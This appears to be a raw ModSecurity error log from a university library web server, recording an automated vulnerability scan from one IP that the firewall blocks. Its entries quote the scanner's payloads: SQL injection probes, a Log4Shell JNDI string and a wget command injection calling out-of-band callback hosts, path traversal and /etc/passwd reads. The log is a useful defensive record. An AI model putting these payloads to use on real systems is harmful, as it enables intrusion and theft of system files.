[Tue Aug 29 11:33:25.355948 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARu2rgAAAAW"]
[Tue Aug 29 11:33:26.467902 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlggpcw9ep5xkqtm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARv7QsAAAAY"]
[Tue Aug 29 11:33:26.477182 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARt-84AAAAV"]
[Tue Aug 29 11:33:27.311397 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARo8ycAAAAT"]
[Tue Aug 29 11:33:27.351693 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAAOJKdgAAAAE"]
[Tue Aug 29 11:33:27.387415 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARo8ysAAAAT"]
[Tue Aug 29 11:33:29.345391 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAAOJKeAAAAAE"]
[Tue Aug 29 11:33:29.380507 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARy-uQAAAAb"]
[Tue Aug 29 11:33:29.383080 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilibfkip.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GcCo-f0AAARy-uQAAAAb"]
[Tue Aug 29 11:33:32.111342 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlgykt4sgwissbbi.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARfwmsAAAAI"]
[Tue Aug 29 11:33:32.163628 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAASBXPAAAAAM"]
[Tue Aug 29 11:33:32.371990 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAASBXPUAAAAM"]
[Tue Aug 29 11:33:34.367206 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARNk-wAAAAS"]
[Tue Aug 29 11:33:35.300818 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASBXQIAAAAM"]
[Tue Aug 29 11:33:35.367240 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAASBXQUAAAAM"]
[Tue Aug 29 11:33:35.411942 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAAOJKe0AAAAE"]
[Tue Aug 29 11:33:36.348281 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAASAHagAAAAH"]
[Tue Aug 29 11:33:36.395778 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARv7TkAAAAY"]
[Tue Aug 29 11:33:37.306905 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAARt--YAAAAV"]
[Tue Aug 29 11:33:37.346654 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARt--gAAAAV"]
[Tue Aug 29 11:33:37.362981 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAAR@KGQAAAAF"]
[Tue Aug 29 11:33:38.412831 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAANsAigAAAAD"]
[Tue Aug 29 11:33:39.330869 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAASAHbgAAAAH"]
[Tue Aug 29 11:33:39.353326 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAARv7UIAAAAY"]
[Tue Aug 29 11:33:40.367238 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARy-xYAAAAb"]
[Tue Aug 29 11:33:40.422955 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARQ4AgAAAAB"]
[Tue Aug 29 11:33:40.466639 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARQ4AoAAAAB"]
[Tue Aug 29 11:33:41.343745 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARQ4A0AAAAB"]
